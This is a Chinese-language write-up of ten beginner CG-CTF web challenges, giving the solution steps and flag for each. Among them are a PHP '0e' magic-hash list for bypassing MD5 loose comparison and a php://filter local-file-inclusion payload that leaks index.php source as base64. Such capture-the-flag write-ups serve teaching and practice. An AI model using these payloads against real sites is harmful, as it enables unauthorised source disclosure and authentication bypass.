CG-CTF Web 1-10 Write Up

一 签到题

打开网站地址 右键查看网页源代码得到flag: nctf{flag_admiaanaaaaaaaaaaa}

二 md5 collision

有一段php源码

$md51 = md5('QNKCDZO');
$a = @$_GET['a'];
$md52 = @md5($a);
if(isset($a)){
if ($a != 'QNKCDZO' && $md51 == $md52) {
    echo "nctf{*****************}";
} else {
    echo "false!!!";
}}
else{echo "please input a";}

通过分析 此时注意到的是此处比较的时候使用的是等于==只是比较最后类型转换之后的数值是否相同，不要求数据类型与数值完全一致（PHP中的全等===才要求这样的条件），同时如果使用“！=”或者“==”来对哈希值比较时，它会把每一个以“0e”开头的哈希值都解释为0，所以如果我们找到一个经过md5加密之后以“0e”开头的字符串并且以get的形式提交即可获得flag!通过查询 有以下字符串可以使用 在url后面加上 ?a=s878926199a 回车即可得到flag: nctf{md5_collision_is_easy}

s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020

三 签到2

首先打开目标网址 要我们输入zhimakaimen即可 但是 当我们输入后却没有得到flag 所以我们右键查看源代码 发现

输入框：

他的最大长度是10 而zhimakaimen是11 所以 我们在查看器中 将maxlenth="10"删去 在输入与zhimakaimen 就可以得到flag: nctf{follow_me_to_exploit}

四 这题不是WEB

打开网页后 出现的却是一个gif图 我们可以把它下载下来 用notepad打开 搜索 nctf 就可以得到flag: nctf{photo_can_also_hid3_msg}

五 层层递进

一开始我盯着源代码看了半天 没有发现问题 后来发现 其中最后的S0.html可以一直点下去 然后是S0.htm 404.html 继续查看源代码 却并没有发现 flag 但是 我们仔细寻找可以发现
在这里

于是得到了flag: nctf{this_is_a_fl4g}

六 AAencode

打开网址 发现是这个界面

于是我们在chrome里下载Charset插件 将编码格式改为UTF-8 于是得到

复制之后 按F12打开控制台 输入之后 弹出flag : nctf{javascript_aaencode}

七 单身二十年

打开网址后 出现 一个链接 点进去后看到

于是我们返回上一页 查看源代码 发现

于是我们在URL中加上 /search_key.php 回车 于是就看到了flag:nctf{yougotit_script_now}

八 php decode

打开题目发现一串PHP代码

可以看出，这是先将+7DnQGFmYVZ+eoGmlg0fd3puUoZ1fkppek1GdVZhQnJSSZq5aUImGNQBAA==base64解密，再将解密后的值膨胀 最后经过for循环 return$ZzvSWE结果 eval是执行php代码的函数 这里我们需要输出最后的结果 因此 将eval改为echo结果如下图

我们将 eval去掉之后 运行 可以得到flag:nctf{gzip_base64_hhhhhh}

九 文件包含

由题目可知 该题为文件包含 LFI 具体内容可以看下面这个网址

https://www.cnblogs.com/c1e4r/articles/7806819.html

在URL后面加上 ?file=php://filter/read=convert.base64-encode/resource=index.php即可得到一串base64加密后的值PGh0bWw+CiAgICA8dGl0bGU+YXNkZjwvdGl0bGU+CiAgICAKPD9waHAKCWVycm9yX3JlcG9ydGluZygwKTsKCWlmKCEkX0dFVFtmaWxlXSl7ZWNobyAnPGEgaHJlZj0iLi9pbmRleC5waHA/ZmlsZT1zaG93LnBocCI+Y2xpY2sgbWU/IG5vPC9hPic7fQoJJGZpbGU9JF9HRVRbJ2ZpbGUnXTsKCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpewoJCWVjaG8gIk9oIG5vISI7CgkJZXhpdCgpOwoJfQoJaW5jbHVkZSgkZmlsZSk7IAovL2ZsYWc6bmN0ZntlZHVsY25pX2VsaWZfbGFjb2xfc2lfc2lodH0KCj8+CjwvaHRtbD4=
将此值进行base64解密 得到flag:nctf{edulcni_elif_lacol_si_siht}

十 单身一百年也没用

看题目就知道这题与“手速”有关系（滑稽） 打开之后发现和第七题差不多 按照第七题的方法来做却发现 他还是会自动跳转到http://chinalover.sinaapp.com/web8/no_key_is_here_forever.php
所以我们就需要采用其他方法 于是我们打开Fiddler抓包 得到flag:nctf{this_is_302_redirect}